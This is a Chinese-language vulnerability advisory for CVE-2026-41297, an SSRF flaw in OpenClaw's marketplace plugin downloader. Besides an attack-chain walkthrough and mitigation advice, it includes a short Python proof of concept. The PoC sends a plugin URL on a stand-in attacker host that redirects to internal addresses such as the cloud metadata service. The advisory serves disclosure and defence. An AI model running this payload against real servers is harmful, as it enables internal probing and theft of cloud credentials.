IPBUF安全漏洞报告
English
CVE-2026-41297 CVSS 7.6 高危

CVE-2026-41297 OpenClaw服务器端请求伪造漏洞

披露日期: 2026-04-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41297
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
OpenClaw

相关标签

SSRF服务端请求伪造OpenClawCVE-2026-41297高危漏洞重定向

漏洞概述

OpenClaw 在 2026.3.31 之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞位于市场插件下载功能,因 `marketplace.ts` 模块未对下载请求的重定向目标进行有效验证,导致攻击者可诱导服务器访问内部或外部资源,造成信息泄露。

技术细节

该漏洞源于 OpenClaw 的 `marketplace.ts` 模块在处理插件下载请求时,未对 HTTP 响应中的重定向地址进行验证,直接跟随服务器返回的 3xx 跳转。攻击者可构造恶意的插件下载链接,该链接指向攻击者控制的外部服务器。当 OpenClaw 服务器请求该链接时,攻击者的服务器返回指向内部敏感资源(如 127.0.0.1 或云元数据服务)的重定向。由于请求由服务器端发起,它能绕过防火墙限制。利用此漏洞,攻击者可探测内网端口、读取本地敏感文件或窃取云服务凭证,从而对内网安全造成严重威胁。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用的是 OpenClaw 且版本低于 2026.3.31。
STEP 2
准备
攻击者搭建一个恶意服务器,配置为对特定请求返回 302 重定向响应,目标指向内网敏感资源(如 http://127.0.0.1/admin 或云元数据服务)。
STEP 3
投递
攻击者向 OpenClaw 的市场插件下载接口发送请求,将插件下载地址指定为攻击者的恶意服务器 URL。
STEP 4
利用
OpenClaw 服务器在处理下载请求时,盲目跟随恶意服务器返回的重定向,向内网敏感资源发起请求。
STEP 5
影响
内网资源的响应被返回给攻击者或记录在日志中,导致敏感信息泄露或内网被进一步探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target OpenClaw instance # The vulnerability exists in the marketplace plugin download functionality target_url = "http://vulnerable-openclaw-instance/api/marketplace/download" # Malicious URL controlled by the attacker # This server should be configured to return a 301/302 redirect # to an internal resource (e.g., http://169.254.169.254/latest/meta-data/) malicious_plugin_url = "http://attacker-controlled.com/redirect-to-internal" # Payload to trigger the download # Assuming the endpoint accepts a 'url' parameter for the plugin source params = { "url": malicious_plugin_url } print(f"[*] Sending SSRF payload to {target_url}") print(f"[*] Initial URL: {malicious_plugin_url}") print("[*] If vulnerable, the server will follow the redirect to the internal target.") try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check the attacker server logs for the redirect interaction.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施
建议立即升级至修复版本。若无法立即升级,应通过网络防火墙限制 OpenClaw 服务器的出站连接,禁止其访问内网网段(如 127.0.0.0/8, 10.0.0.0/8 等)及云厂商元数据服务地址(如 169.254.169.254),并暂时禁用非必要的插件下载功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表